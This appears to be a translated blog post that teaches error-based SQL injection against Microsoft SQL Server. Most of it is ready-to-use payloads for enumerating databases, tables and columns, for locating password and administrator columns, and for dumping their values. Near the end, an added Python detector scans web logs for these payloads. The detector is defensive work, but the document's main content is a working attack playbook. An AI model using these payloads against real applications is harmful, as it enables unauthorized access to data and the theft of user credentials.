• MSSQL injection: techniques for enumerating the database


    I. Using having and group by to obtain the table name and column names
    1. Once an injection point is confirmed, submit having 1=1-- directly; the error message reveals the current table name and its first column.
    2. Then submit
    group by 字段名1 having 1=1--
    to obtain the second column (字段名1 stands for the column name obtained in the previous step).
    3. Then
    group by 字段名1,字段名2 having 1=1--

    4. group by 字段名1,字段名2,字段名3,字段名n having 1=1--
    Repeat until the page returns normally; at that point all column names have been obtained.

    II. order by and data-type conversion errors
    1. Dump all database names
    and db_name()=0--  dumps the current database name

    and db_name(n)>0--
    Vary the value of n to obtain all database names

    and 0=(select top n cast([name] as nvarchar(256))%2bchar(94)%2bcast([filename] as nvarchar(256)) from(select top 1 dbid,name,filename from [master].[dbo].[sysdatabases] order by [dbid]) t order by [dbid] desc)--

    Vary the value of n to obtain all database names

    2. Dump all table names

    The following query reveals the number of tables:
    and (select cast(count(1) as varchar(10))%2bchar(94) from [sysobjects] where xtype=char(85) and status!=0)=0--

    Dump the first table name:
    and (select top 1 cast(name as varchar(256)) from (select top 1 id,name from [sysobjects] where xtype=char(85) and status!=0 order by id) t order by id desc)=0--

    Then continue with:
    and (select top 1 cast(name as varchar(256)) from (select top 2 id,name from [sysobjects] where xtype=char(85) and status!=0 order by id) t order by id desc)=0--

    The queries above dump the tables of the current database. To dump the tables of another database, the following dumps the first table name of the master database:
    and 0<>(select top 1 name from master.dbo.sysobjects where xtype=0x7500 and name not in(select top 1 name from master.dbo.sysobjects where xtype=0x7500))--
    Increment the number to dump all the table names.

    3. Dump the table name and columns that hold the administrator accounts
    and (select top 1 cast(id as nvarchar(20))%2bchar(124) from [库名]..[sysobjects] where name='表名')=0--
    (库名 and 表名 are placeholders for the database name and the table name.)

    This dumps the ID; next, submit the following to dump the number of columns:
    and (select cast(count(1) as varchar(10))%2bchar(94) from [库名]..[syscolumns] where id=373576369)=0--

    Then submit
    and (select top 1 cast(name as varchar(8000)) from (select top 1 colid,name from [库名]..[syscolumns] where id=373576369 order by colid) t order by colid desc)=0--

    Change the number to obtain all column names.

    4. Dump the table and columns that hold the administrator accounts in one step
    and (select top 1 t_name%2bchar(124)%2bc_name from (select top 20 object_name(id) as t_name,name as c_name from syscolumns where charindex(cast(0x70617373 as varchar(2000)),name)>0 and left(name,1)!=0x40 order by t_name asc) as T order by t_name desc)>0--

    Here 0x70617373 is the hexadecimal encoding of pass.

    5. Dump all column values
    and (select cast(count(1) as varchar(8000))%2bchar(94) from [库名]..[表名] where 1=1)>0--
    The query above dumps the number of records.

    Then
    and (select top 1 isnull(cast([字段值1] as nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([字段值2] as nvarchar(4000)),char(32)) from [表名] where 1=1 order by [字段值1])=0--

    III. Another way to enumerate the database
    1. Dump all database names
    and 1=(select name from master.dbo.sysdatabases where dbid=1)--

    Increase the dbid value above to obtain the other database names.

    2. Dump all tables in the current database
    and (select top 1 name from (select top n name from sysobjects where xtype=0x75 order by name) t order by name desc)=0

    Change the number n to query all table names.

    3. To query the table names of another database (cross-database), submit
    and (select top 1 name from(select top n name from 数据库名..sysobjects where xtype=0x75 order by name) t order by name desc)=0
    Change the value of n to query all table names (数据库名 is a placeholder for the database name).

    4. Dump column names and column values
    and (select col_name(object_id('hehe'),n))=0
    Change the value of n to obtain all column names.

    and (select top 1 字段名 from 表名)>0  After obtaining the first column value,

    and (select top 1 字段名 from 表名 where 字段名<>字段值1)>0
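As an added example from the defender's side (not part of the original post), here is a small Python detector that flags the error-based enumeration payloads described above when they appear in web-server access logs; the log lines are constructed samples, and the signature set, path name and log format are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the error-based MSSQL enumeration payloads discussed on this
# page; each is matched against the URL-decoded, lower-cased query string.
SIGNATURES = {
    "having_groupby": re.compile(r"(group\s+by\s+[\w,\s\[\]]+)?\bhaving\s+1\s*=\s*1\s*--"),
    "db_name_probe": re.compile(r"\bdb_name\s*\(\s*\d*\s*\)\s*[=<>]"),
    "catalog_access": re.compile(r"\bsys(databases|objects|columns)\b"),
    "cast_concat": re.compile(r"\bcast\s*\(.*?\)\s*\+\s*char\s*\(\s*(94|124)\s*\)"),
    "col_name_probe": re.compile(r"\bcol_name\s*\(\s*object_id\s*\("),
}

# Common Log Format: client - - [time] "METHOD path HTTP/x" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')


def classify_query(raw_query: str) -> list[str]:
    """Return the names of the enumeration signatures found in one query string."""
    decoded = unquote_plus(raw_query).lower()  # %2b -> '+', %20 -> ' '
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]


def scan_log(log_text: str) -> list[dict]:
    """Parse CLF lines and return one finding per request that carries a payload."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _method, path, status = m.groups()
        resource, _, query = path.partition("?")
        hits = classify_query(query)
        if hits:
            findings.append({"client": client, "path": resource,
                             "status": int(status), "signatures": hits})
    return findings


# Constructed sample log (not real traffic); the payloads mirror the ones above.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Oct/2012:10:01:02 +0800] "GET /news.asp?id=1 HTTP/1.1" 200 5123
10.0.0.9 - - [12/Oct/2012:10:01:07 +0800] "GET /news.asp?id=1%20having%201=1-- HTTP/1.1" 500 612
10.0.0.9 - - [12/Oct/2012:10:01:15 +0800] "GET /news.asp?id=1%20and%20db_name(1)>0-- HTTP/1.1" 500 640
10.0.0.9 - - [12/Oct/2012:10:01:33 +0800] "GET /news.asp?id=1%20and%20(select%20cast(count(1)%20as%20varchar(10))%2bchar(94)%20from%20[sysobjects]%20where%20xtype=char(85)%20and%20status!=0)=0-- HTTP/1.1" 500 655
10.0.0.7 - - [12/Oct/2012:10:02:00 +0800] "GET /news.asp?id=2&sort=name HTTP/1.1" 200 5001
"""

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Every flagged request in the sample received a 500 response, which is the verbose error page this technique relies on; parameterized queries and generic error pages remove that channel, while the detector only surfaces attempts.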

  • Original article: https://www.cnblogs.com/shanmao/p/2772319.html